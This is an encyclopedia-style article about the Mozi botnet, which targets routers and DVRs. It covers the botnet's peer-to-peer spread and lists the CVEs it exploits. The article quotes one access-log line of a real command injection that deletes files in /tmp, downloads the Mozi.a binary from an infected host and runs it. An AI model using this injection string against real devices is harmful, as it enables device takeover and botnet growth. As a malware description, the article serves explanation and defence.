Mozi botnet

From EverybodyWiki Bios & Wiki




The Mozi Botnet is a botnet targeting IoT devices. In September 2019, 71% of the botnet was located in China. In March, it jumped to 81%.[1] The botnet was first discovered near the end of 2019 and is currently active. Similar to the Mirai botnet, it targets consumer routers via security vulnerabilities and shell injections.[2] It uses peer to peer technology to spread infectious code to new hosts.[3]

Behavior[edit]

File:Mozi Botnet Access Log.png
Log of a command injection by the Mozi Botnet

While the botnet can target IoT devices via weak telnet passwords, it can also exploit over HTTP.[4]

115.51.xx.xx - - [13/Nov/2020:15:54:19 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://115.51.xx.xx:36669/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 4214 "-" "Hello, world"

In the request above, an infected host attempts to download and execute the "Mozi.a" file on to the requested server. The Mozi.a file is stored on the infected host on a random port. Targeted hosts include routers and DVRs.

The Botnet targets the following vulnerabilities:

CVE-2017-17215

CVE-2018-10561

CVE-2018-10562

CVE-2014-8361

CVE-2008-4873

CVE-2016-6277

CVE-2015-2051

The malware inserted onto the server is designed to interact with other Peers to exchange information. The malware can be executed on ARM of MIPS processors. Once a host is infected, it can carry out DDoS attacks, payload execution, and additional distribution of the malware.

References[edit]

  1. "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.
  2. "A New Botnet Attack Just Mozied Into Town". Security Intelligence. Retrieved 2021-03-28.
  3. "Mozi Botnet Accounts for Most Traffic in Q1 2020, New Research Shows". Bitdefender Box. Retrieved 28 March 2021. Unknown parameter |url-status= ignored (help)
  4. "New Mozi malware family quietly amasses IoT bots". Lumen. 2020-04-13. Retrieved 2021-03-28.

Mozi Botnet Article Submission[edit]

This article "Mozi botnet" is from Wikipedia. The list of its authors can be seen in its historical and/or the page Edithistory:Mozi botnet. Articles copied from Draft Namespace on Wikipedia could be seen on the Draft Namespace of Wikipedia and not main one.